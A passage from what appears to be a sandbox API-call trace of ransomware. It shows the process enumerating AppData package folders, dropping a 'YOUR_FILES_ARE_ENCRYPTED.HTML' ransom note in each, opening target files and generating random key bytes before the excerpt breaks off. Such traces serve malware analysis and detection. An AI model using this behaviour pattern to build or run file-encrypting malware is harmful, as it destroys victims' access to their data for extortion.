lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.057] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState") returned 90 [0116.057] GetProcessHeap () returned 0x600000 [0116.057] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.058] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState" [0116.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState\\*" [0116.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62574156, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62574156, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62574156, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.058] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62574156, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62574156, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62574156, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0116.058] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62574156, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62574156, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62574156, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0116.058] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.058] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0116.058] GetProcessHeap () returned 0x600000 [0116.058] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.059] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.060] CloseHandle (hObject=0x32c) returned 1 [0116.060] GetProcessHeap () returned 0x600000 [0116.060] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.060] GetProcessHeap () returned 0x600000 [0116.060] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.060] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62574156, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62574156, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62574156, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.060] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.060] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0116.060] GetProcessHeap () returned 0x600000 [0116.060] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.061] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.062] CloseHandle (hObject=0x214) returned 1 [0116.062] GetProcessHeap () returned 0x600000 [0116.062] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.062] GetProcessHeap () returned 0x600000 [0116.062] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.063] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41ae4c9, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4ed334a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcb66363, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Messaging_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MES")) returned 1 [0116.064] StrStrIW (lpFirst="Microsoft.Messaging_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.064] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe") returned 82 [0116.064] GetProcessHeap () returned 0x600000 [0116.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.070] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe" [0116.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\*" [0116.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41ae4c9, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcb66363, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.070] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41ae4c9, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfcb66363, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfcb66363, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.070] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4ed334a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf51ce46c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf51ce46c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.070] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.070] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC") returned 85 [0116.070] GetProcessHeap () returned 0x600000 [0116.070] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.071] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC" [0116.071] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\*" [0116.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4ed334a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf51ce46c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf51ce46c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.071] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4ed334a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf51ce46c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf51ce46c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.071] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551ddd9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.072] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.072] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache") returned 95 [0116.072] GetProcessHeap () returned 0x600000 [0116.072] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.073] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache" [0116.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551ddd9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.073] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551ddd9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 1 [0116.073] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x1cf55339, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1cf55339, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1cf55339, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0116.073] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.073] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\container.dat") returned 109 [0116.073] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.073] lstrlenW (lpString=".dat") returned 4 [0116.073] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.073] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0116.074] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0116.074] CloseHandle (hObject=0x324) returned 1 [0116.074] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2d1d1d0a, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x2d1d1d0a, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x2d1d1d0a, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="FAXM6P1O", cAlternateFileName="")) returned 1 [0116.074] StrStrIW (lpFirst="FAXM6P1O", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.074] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O") returned 104 [0116.074] GetProcessHeap () returned 0x600000 [0116.074] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.075] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O" [0116.075] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\*" [0116.075] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2d1d1d0a, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x2d1d1d0a, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x2d1d1d0a, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.075] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2d1d1d0a, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x2d1d1d0a, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x2d1d1d0a, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0116.075] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d1d1d0a, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x2d1d1d0a, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x2d26e045, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x129d0, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName="15_10.0.0[1].json", cAlternateFileName="15_100~1.JSO")) returned 1 [0116.075] StrStrIW (lpFirst="15_10.0.0[1].json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.075] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json") returned 122 [0116.075] PathFindExtensionW (pszPath="15_10.0.0[1].json") returned=".json" [0116.075] lstrlenW (lpString=".json") returned 5 [0116.075] PathFindExtensionW (pszPath="15_10.0.0[1].json") returned=".json" [0116.075] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0116.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcache\\faxm6p1o\\15_10.0.0[1].json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0116.076] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=76240) returned 1 [0116.076] GetProcessHeap () returned 0x600000 [0116.076] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.078] wsprintfW (in: param_1=0x19da82, param_2="%02X" | out: param_1="2E") returned 2 [0116.078] wsprintfW (in: param_1=0x19da86, param_2="%02X" | out: param_1="AA") returned 2 [0116.078] wsprintfW (in: param_1=0x19da8a, param_2="%02X" | out: param_1="54") returned 2 [0116.078] wsprintfW (in: param_1=0x19da8e, param_2="%02X" | out: param_1="3E") returned 2 [0116.078] wsprintfW (in: param_1=0x19da92, param_2="%02X" | out: param_1="E8") returned 2 [0116.078] wsprintfW (in: param_1=0x19da96, param_2="%02X" | out: param_1="F5") returned 2 [0116.078] wsprintfW (in: param_1=0x19da9a, param_2="%02X" | out: param_1="BE") returned 2 [0116.078] wsprintfW (in: param_1=0x19da9e, param_2="%02X" | out: param_1="48") returned 2 [0116.078] wsprintfW (in: param_1=0x19daa2, param_2="%02X" | out: param_1="05") returned 2 [0116.078] wsprintfW (in: param_1=0x19daa6, param_2="%02X" | out: param_1="02") returned 2 [0116.078] wsprintfW (in: param_1=0x19daaa, param_2="%02X" | out: param_1="DB") returned 2 [0116.078] wsprintfW (in: param_1=0x19daae, param_2="%02X" | out: param_1="3A") returned 2 [0116.078] wsprintfW (in: param_1=0x19dab2, param_2="%02X" | out: param_1="7A") returned 2 [0116.078] wsprintfW (in: param_1=0x19dab6, param_2="%02X" | out: param_1="91") returned 2 [0116.078] wsprintfW (in: param_1=0x19daba, param_2="%02X" | out: param_1="8A") returned 2 [0116.078] wsprintfW (in: param_1=0x19dabe, param_2="%02X" | out: param_1="57") returned 2 [0116.078] wsprintfW (in: param_1=0x19dac2, param_2="%02X" | out: param_1="F0") returned 2 [0116.078] wsprintfW (in: param_1=0x19dac6, param_2="%02X" | out: param_1="41") returned 2 [0116.078] wsprintfW (in: param_1=0x19daca, param_2="%02X" | out: param_1="78") returned 2 [0116.079] wsprintfW (in: param_1=0x19dace, param_2="%02X" | out: param_1="21") returned 2 [0116.079] wsprintfW (in: param_1=0x19dad2, param_2="%02X" | out: param_1="97") returned 2 [0116.079] wsprintfW (in: param_1=0x19dad6, param_2="%02X" | out: param_1="65") returned 2 [0116.079] wsprintfW (in: param_1=0x19dada, param_2="%02X" | out: param_1="5B") returned 2 [0116.079] wsprintfW (in: param_1=0x19dade, param_2="%02X" | out: param_1="3A") returned 2 [0116.079] wsprintfW (in: param_1=0x19dae2, param_2="%02X" | out: param_1="90") returned 2 [0116.079] wsprintfW (in: param_1=0x19dae6, param_2="%02X" | out: param_1="FE") returned 2 [0116.079] wsprintfW (in: param_1=0x19daea, param_2="%02X" | out: param_1="BA") returned 2 [0116.079] wsprintfW (in: param_1=0x19daee, param_2="%02X" | out: param_1="18") returned 2 [0116.079] wsprintfW (in: param_1=0x19daf2, param_2="%02X" | out: param_1="A1") returned 2 